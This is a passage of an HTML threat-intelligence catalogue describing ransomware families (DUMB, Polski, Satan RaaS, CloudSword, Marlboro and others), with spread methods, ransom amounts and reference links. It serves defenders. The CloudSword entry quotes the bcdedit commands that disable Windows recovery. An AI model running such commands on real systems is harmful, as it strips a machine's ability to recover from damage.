<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dumb_ransomware"><a class="anchor" href="#_dumb_ransomware"></a><a class="link" href="#_dumb_ransomware">DUMB Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1726. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/bleepincomputer/status/816053140147597312?lang=en">https://twitter.com/bleepincomputer/status/816053140147597312?lang=en</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_x_files"><a class="anchor" href="#_x_files"></a><a class="link" href="#_x_files">X-Files</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1727. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017_02_01_archive.html">https://id-ransomware.blogspot.co.il/2017_02_01_archive.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_polski_ransomware"><a class="anchor" href="#_polski_ransomware"></a><a class="link" href="#_polski_ransomware">Polski Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The Ransom is 249$ and the hacker demands that the victim gets in contact through e-mail and a Polish messenger called Gadu-Gadu.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1728. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yourransom_ransomware"><a class="anchor" href="#_yourransom_ransomware"></a><a class="link" href="#_yourransom_ransomware">YourRansom Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This hacker demands that the victim contacts him through email and decrypts the files for FREE.(moreinfo in the link below)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1729. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/">https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/_ddoxer/status/827555507741274113">https://twitter.com/_ddoxer/status/827555507741274113</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ranion_raasransomware"><a class="anchor" href="#_ranion_raasransomware"></a><a class="link" href="#_ranion_raasransomware">Ranion RaasRansomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ranion Raas gives the opportunity to regular people to buy and distribute ransomware for a very cheap price. (More info in the link below). RaaS service</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1730. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html">https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/ranion-ransomware-as-a-service-available-on-the-dark-web-for-educational-purposes/">https://www.bleepingcomputer.com/news/security/ranion-ransomware-as-a-service-available-on-the-dark-web-for-educational-purposes/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_potato_ransomware"><a class="anchor" href="#_potato_ransomware"></a><a class="link" href="#_potato_ransomware">Potato Ransomware</a></h3>
<div class="paragraph">
<p>Wants a ransom to get the victims files back . Originated in English. Spread worldwide.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1731. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_of_ransomware_opentoyou_formerly_known_as_opentodecrypt"><a class="anchor" href="#_of_ransomware_opentoyou_formerly_known_as_opentodecrypt"></a><a class="link" href="#_of_ransomware_opentoyou_formerly_known_as_opentodecrypt">of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)</a></h3>
<div class="paragraph">
<p>This ransomware is originated in English, therefore could be used worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1732. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ransomplus"><a class="anchor" href="#_ransomplus"></a><a class="link" href="#_ransomplus">RansomPlus</a></h3>
<div class="paragraph">
<p>Author of this ransomware is sergej. Ransom is 0.25 bitcoins for the return of files. Originated in English. Used worldwide. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1733. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html">http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/825411602535088129">https://twitter.com/jiriatvirlab/status/825411602535088129</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptconsole"><a class="anchor" href="#_cryptconsole"></a><a class="link" href="#_cryptconsole">CryptConsole</a></h3>
<div class="paragraph">
<p>This ransomware does not actually encrypt your file, but only changes the names of your files, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1734. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/">https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/824705553201057794">https://twitter.com/PolarToffee/status/824705553201057794</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zxz_ramsomware"><a class="anchor" href="#_zxz_ramsomware"></a><a class="link" href="#_zxz_ramsomware">ZXZ Ramsomware</a></h3>
<div class="paragraph">
<p>Originated in English, could affect users worldwide, however so far only reports from Saudi Arabia. The malware name founded by a windows server tools is called win32/wagcrypt.A</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1735. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/638191/zxz-ransomware-support-help-topic-zxz/?hl=%2Bzxz#entry4168310">https://www.bleepingcomputer.com/forums/t/638191/zxz-ransomware-support-help-topic-zxz/?hl=%2Bzxz#entry4168310</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vxlock_ransomware"><a class="anchor" href="#_vxlock_ransomware"></a><a class="link" href="#_vxlock_ransomware">VxLock Ransomware</a></h3>
<div class="paragraph">
<p>Developed in Visual Studios in 2010. Original name is VxCrypt. This ransomware encrypts your files, including photos, music, MS office, Open Office, PDF… etc</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1736. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/vxlock-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/vxlock-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_funfact_ransomware"><a class="anchor" href="#_funfact_ransomware"></a><a class="link" href="#_funfact_ransomware">FunFact Ransomware</a></h3>
<div class="paragraph">
<p>Funfact uses an open code for GNU Privacy Guard (GnuPG), then asks to email them to find out the amout of bitcoin to send (to receive a decrypt code). Written in English, can attach all over the world. The ransom is 1.22038 BTC, which is 1100USD.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1737. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/funfact.html">https://id-ransomware.blogspot.co.il/2017/01/funfact.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.enigmasoftware.com/funfactransomware-removal/">http://www.enigmasoftware.com/funfactransomware-removal/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zekwacrypt_ransomware"><a class="anchor" href="#_zekwacrypt_ransomware"></a><a class="link" href="#_zekwacrypt_ransomware">ZekwaCrypt Ransomware</a></h3>
<div class="paragraph">
<p>First spotted in May 2016, however made a big comeback in January 2017. Its directed to English speaking users, therefore is able to infect worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1738. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html">http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sage_2_0_ransomware"><a class="anchor" href="#_sage_2_0_ransomware"></a><a class="link" href="#_sage_2_0_ransomware">Sage 2.0 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. This ransomware attacks your MS Office by offering a Micro to help with your program, but instead incrypts all your files if the used id not protected. Predecessor CryLocker</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1739. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/">https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securityweek.com/sage-20-ransomware-demands-2000-ransom">http://www.securityweek.com/sage-20-ransomware-demands-2000-ransom</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/">https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.govcert.admin.ch/blog/27/sage-2.0-comes-with-ip-generation-algorithm-ipga">https://www.govcert.admin.ch/blog/27/sage-2.0-comes-with-ip-generation-algorithm-ipga</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cloudsword_ransomware"><a class="anchor" href="#_cloudsword_ransomware"></a><a class="link" href="#_cloudsword_ransomware">CloudSword Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. Uses the name “Window Update” to confuse its victims. Then imitates the window update process , while turning off the Window Startup Repair and changes the BootStatusPolicy using these commands: bcdedit.exe /set {default} recoveryenabled No bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1740. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html">https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://bestsecuritysearch.com/cloudsword-ransomware-virus-removal-steps-protection-updates/">http://bestsecuritysearch.com/cloudsword-ransomware-virus-removal-steps-protection-updates/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/822653335681593345">https://twitter.com/BleepinComputer/status/822653335681593345</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dn"><a class="anchor" href="#_dn"></a><a class="link" href="#_dn">DN</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. Uses the name “Chrome Update” to confuse its victims. Then imitates the chrome update process ,while encrypting the files. DO NOT pay the ransom, since YOUR COMPUTER WILL NOT BE RESTORED FROM THIS MALWARE!!!!</p>
</div>
<div class="paragraph">
<p>DN is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fake</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1741. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html">https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_garryweber_ransomware"><a class="anchor" href="#_garryweber_ransomware"></a><a class="link" href="#_garryweber_ransomware">GarryWeber Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. Its original name is FileSpy and FileSpy Application. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, Open Office, pictures etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1742. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/garryweber.html">https://id-ransomware.blogspot.co.il/2017/01/garryweber.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_satan_ransomware"><a class="anchor" href="#_satan_ransomware"></a><a class="link" href="#_satan_ransomware">Satan Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, Open Office, pictures etc.. This ransomware promotes other to download viruses and spread them as ransomware to infect other users and keep 70% of the ransom. (leaving the other 30% to Satan) <a href="https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif" class="bare">https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif</a> RaaS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1743. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html">https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/">https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2017-satan-raas-spora-locky-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2017-satan-raas-spora-locky-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/">https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/Xylit0l/status/821757718885236740">https://twitter.com/Xylit0l/status/821757718885236740</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_havoc"><a class="anchor" href="#_havoc"></a><a class="link" href="#_havoc">Havoc</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures , videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Havoc is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HavocCrypt Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1744. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/havoc-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/havoc-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptosweettooth_ransomware"><a class="anchor" href="#_cryptosweettooth_ransomware"></a><a class="link" href="#_cryptosweettooth_ransomware">CryptoSweetTooth Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Its fake name is Bitcoin and makers name is Santiago. Work of the encrypted requires the user to have .NET Framework 4.5.2. on his computer.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1745. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/cryptosweettooth.html">https://id-ransomware.blogspot.co.il/2017/01/cryptosweettooth.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://sensorstechforum.com/remove-cryptosweettooth-ransomware-restore-locked-files/">http://sensorstechforum.com/remove-cryptosweettooth-ransomware-restore-locked-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kaandsona_ransomware"><a class="anchor" href="#_kaandsona_ransomware"></a><a class="link" href="#_kaandsona_ransomware">Kaandsona Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The word Kaandsona is Estonian, therefore the creator is probably from Estonia. Crashes before it encrypts</p>
</div>
<div class="paragraph">
<p>Kaandsona Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RansomTroll Ransomware</p>
</li>
<li>
<p>Käändsõna Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1746. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html">https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/819927858437099520">https://twitter.com/BleepinComputer/status/819927858437099520</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lambdalocker_ransomware"><a class="anchor" href="#_lambdalocker_ransomware"></a><a class="link" href="#_lambdalocker_ransomware">LambdaLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English and Chinese speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1747. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/lambdalocker.html">https://id-ransomware.blogspot.co.il/2017/01/lambdalocker.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cfoc.org/how-to-restore-files-affected-by-the-lambdalocker-ransomware/">http://cfoc.org/how-to-restore-files-affected-by-the-lambdalocker-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nmoreia_2_0_ransomware"><a class="anchor" href="#_nmoreia_2_0_ransomware"></a><a class="link" href="#_nmoreia_2_0_ransomware">NMoreia 2.0 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>NMoreia 2.0 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HakunaMatataRansomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1748. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html">https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016_03_01_archive.html">https://id-ransomware.blogspot.co.il/2016_03_01_archive.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_marlboro_ransomware"><a class="anchor" href="#_marlboro_ransomware"></a><a class="link" href="#_marlboro_ransomware">Marlboro Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is .2 bitcoin, however there is no point of even trying to pay, since this damage is irreversible. Once the ransom is paid the hacker does not return decrypt the files. Another name is DeMarlboro and it is written in language C++. Pretend to encrypt using RSA-2048 and AES-128 (really its just XOR)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1749. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/marlboro.html">https://id-ransomware.blogspot.co.il/2017/01/marlboro.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/marlboro">https://decrypter.emsisoft.com/marlboro</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/">https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/</a></p></td>
</tr>
</tbody>
</table>
</div>
